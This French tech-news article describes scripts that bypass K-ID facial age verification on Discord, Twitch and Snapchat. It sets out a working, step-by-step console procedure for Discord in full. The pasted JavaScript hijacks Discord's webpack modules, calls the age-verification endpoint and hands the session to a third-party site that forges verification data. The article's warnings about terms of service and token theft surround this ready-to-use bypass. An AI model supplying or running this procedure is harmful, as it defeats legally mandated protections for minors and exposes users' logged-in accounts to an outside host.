Comment contourner la vérification d'âge sur Discord, Twitch et Snapchat : guide pratique

# Comment contourner la vérification d’âge sur Discord, Twitch et Snapchat : guide pratique



![](https://pix-geeks.com/wp-content/uploads/2026/02/contourner-verification-age-discord-twitch-snapchat-guide-pratique-180601.jpg)

**Date:** 21 mars 2026

**Source:** [PIX GEEKS](https://pix-geeks.com)

**Catégories:** [Best of](https://pix-geeks.com/featured/), [High-Tech](https://pix-geeks.com/tech/) > [Intelligence Artificielle](https://pix-geeks.com/tech/intelligence-artificielle/), [High-Tech](https://pix-geeks.com/tech/) > [Réseaux sociaux](https://pix-geeks.com/tech/reseaux-sociaux/)

**Sur GitHub, Telegram et certains forums spécialisés, des scripts circulent avec une promesse claire : valider automatiquement un compte comme « adulte » sur Discord et d’autres plateformes sans passer par la procédure officielle. À première vue, la proposition peut sembler séduisante pour les utilisateurs agacés par la généralisation des contrôles d’âge. Mais derrière cette façade technique se cache une réalité beaucoup plus sensible : il s’agit d’un contournement délibéré d’un mécanisme de sécurité mis en place par les plateformes.**

Depuis plusieurs mois, des services comme Discord renforcent leurs procédures de vérification afin de se conformer aux exigences réglementaires sur la protection des mineurs. Au Royaume-Uni notamment, l’[Online Safety Act](https://www.gov.uk/government/publications/online-safety-act-explainer/online-safety-act-explainer) impose des obligations strictes aux plateformes numériques. Face à ce durcissement, certains développeurs indépendants ont cherché à analyser le fonctionnement interne du système de vérification d’âge pour tenter d’en exploiter les failles.

## K-ID : une vérification d’âge qui repose sur l’analyse faciale

Pour vérifier l’âge d’un utilisateur, Discord s’appuie sur un prestataire spécialisé, [**K-ID**](https://www.k-id.com/), qui lui-même collabore avec un service de reconnaissance faciale. L’utilisateur doit généralement **effectuer un selfie ou scanner un QR code** afin de déclencher un processus d’analyse automatisée.

Contrairement à d’autres systèmes, il ne s’agirait pas d’envoyer une vidéo brute du visage, mais plutôt des **données calculées à partir de l’image**, ce que les spécialistes appellent des métadonnées biométriques.

![](https://pix-geeks.com/wp-content/uploads/2026/02/contourner-verification-age-discord-twitch-snapchat-guide-pratique-111046.jpg)

Ces données sont ensuite transmises sous forme chiffrée aux serveurs du prestataire. Si l’âge estimé dépasse le seuil requis, le compte est marqué comme **vérifié**\.Sur le papier, le dispositif vise un équilibre entre **protection des mineurs et respect relatif de la vie privée**.

Dans les faits, tout système automatisé devient une cible potentielle pour ceux qui cherchent à le comprendre… et à le contourner.

## Des scripts permettent de simuler une validation officielle

Les scripts actuellement [partagés en ligne](https://age-verifier.kibty.town/) ne piratent pas Discord au sens classique du terme. Ils cherchent plutôt à **imiter les échanges techniques** entre le navigateur de l’utilisateur et l’API de la plateforme. Concrètement, ils demandent à l’utilisateur d’ouvrir la console développeur de son navigateur et d’y coller un morceau de code.

Prenons l’exemple du script proposé pour Discord :
- Rendez-vous sur [discord.com/app](https://discord.com/app)
- Ouvrez la console Javascript de votre navigateur (appui sur F12 sur Chrome)
- Copiez le texte suivant dans la console Javascript :

// add a chunk to extract webpack's moduleCache
let webpackRequire = webpackChunkdiscord_app.push([###SHORTCODE_1###, {}, (r) => r]);
// cleanup the chunk we added
webpackChunkdiscord_app.pop();

let modules = webpackRequire.m;
let cache = webpackRequire.c;

// https://github.com/moonlight-mod/moonlight/blob/main/packages/core-extensions/src/spacepack/webpackModules/spacepack.ts
// helper to find a webpack module via code snippet
function findByCode(src) {
 for (const ###SHORTCODE_2### of Object.entries(modules)) {
 if (mod.toString().includes(src)) {
 return cache###SHORTCODE_3###.exports;
 }
 }
}

// helper to find an object by its key
function findObjectFromKey(exports, key) {
 if (!exports) return;
 for (const exportKey in exports) {
 const obj = exports###SHORTCODE_4###;
 if (obj && obj###SHORTCODE_5###) return obj;
 }
}

// https://github.com/moonlight-mod/moonlight/blob/main/packages/mappings/src/mappings/discord/utils/HTTPUtils.ts
// find the discord api client
const api = findObjectFromKey(
 findByCode('.set("X-Audit-Log-Reason", '),
 "patch",
);

// send a api request to discord /age-verification/verify and then redirect the page to our website
const request = await api.post({
 url: "/age-verification/verify",
 body: { method: 3 },
});
const verificationUrl = request.body.verification_webview_url;
window.location.href = 'https://age-verifier.kibty.town/webview?url=${encodeURIComponent(verificationUrl)}';
- Et validez avec la touche **Entrée**

Ce code va analyser la structure interne de l’application web, identifier le module responsable des requêtes réseau, puis **envoyer directement une demande à l’endpoint dédié à la vérification d’âge**\.Ensuite, l’utilisateur est redirigé vers un site tiers qui génère des données présentées comme légitimes.

L’objectif est simple : produire des paramètres chiffrés qui ressemblent suffisamment à ceux d’une vraie vérification pour tromper le système automatisé.

Derrière le discours technique, chiffrement AES-GCM, clés dérivées via HKDF, prédictions statistiques, suppression des valeurs aberrantes, le principe reste basique : **fabriquer des données crédibles** pour que le serveur les accepte.

## Trafiquer ainsi le contrôle d’âge viole les conditions d’utilisation de Discord et met en danger la sécurité de votre compte

Sur le plan juridique et contractuel, la situation est claire. Contourner un mécanisme de vérification constitue une **violation des conditions d’utilisation** des plateformes concernées. Un compte identifié comme **frauduleusement vérifié peut être suspendu ou supprimé sans préavis**\.Dans certains contextes réglementaires, cela pourrait également exposer l’utilisateur à des conséquences plus sérieuses.

Par ailleurs, coller du code inconnu dans la console d’un navigateur revient à **donner à ce code les mêmes permissions que l’utilisateur connecté**\.Un script malveillant pourrait théoriquement récupérer des jetons d’authentification, détourner un compte ou accéder à des informations sensibles. Même si les auteurs affirment ne « rien avoir à cacher », la prudence reste de mise.

## Les mécanismes de vérification d’âge sont encore perfectibles

Les vérification d’age comme K-ID ou encore [BorderAge](https://pix-geeks.com/borderage/) sont très peu intrusives, et on ne vous conseille pas de les contourner. Néanmoins étant donné les hack en séries d’informations confidentielles comme le récent [leak des donnés des Cartes Avantages Jeunes](https://pix-geeks.com/carte-avantages-jeunes-hack/), il est **difficile aujourd’hui d’accorder sa confiance aveugle à des tiers plus vraiment de confiance**.

Les auteurs des scripts partagés ci-dessus expliquent avoir dû adapter leur méthode après des mises à jour du prestataire de vérification faciale ce qui illustre une dynamique classique : à chaque tentative de contournement correspondra un renforcement du contrôle. Une première version d’outil aurait cessé de fonctionner après que le partenaire de K-ID a durci ses vérifications internes.

Espérons que les scripts partagés ne fonctionneront plus d’ici quelques jours et que le contrôle K-ID sera renforcé et fiabilisé.

La nouvelle génération de scripts prétend désormais reproduire non seulement le chiffrement attendu, mais aussi certains éléments comportementaux, comme la cohérence des « temps d’état » ou la correspondance entre caméra déclarée et périphériques détectés. Autrement dit, les développeurs tentent d’imiter non seulement la forme des données, mais aussi leur logique interne.

Cette mécanique rappelle d’autres batailles numériques : lutte contre les bloqueurs de publicité, contournement des DRM, ou encore bypass de protections anti-bots. À chaque étape, les systèmes se complexifient, et les scripts deviennent plus sophistiqués.

![man wearing red hoodie](https://pix-geeks.com/wp-content/uploads/2026/02/hacker.jpg)

En tous cas la bataille autour de la vérification d’âge ne fait probablement que commencer. Entre impératif de protection et volonté d’anonymat, l’équilibre reste fragile, et les lignes de code deviennent le nouveau terrain d’affrontement.

---

**Article précédent:** [AI.com : vendu 70M$ à Crypto.com le site plante pendant le Superbowl](https://pix-geeks.com/ai-com/) | **Article suivant:** [Etude Harvard : L'IA augmente la charge de travail et ne fait pas gagner de temps](https://pix-geeks.com/etude-havard-ia-perdre-temps-gagner/)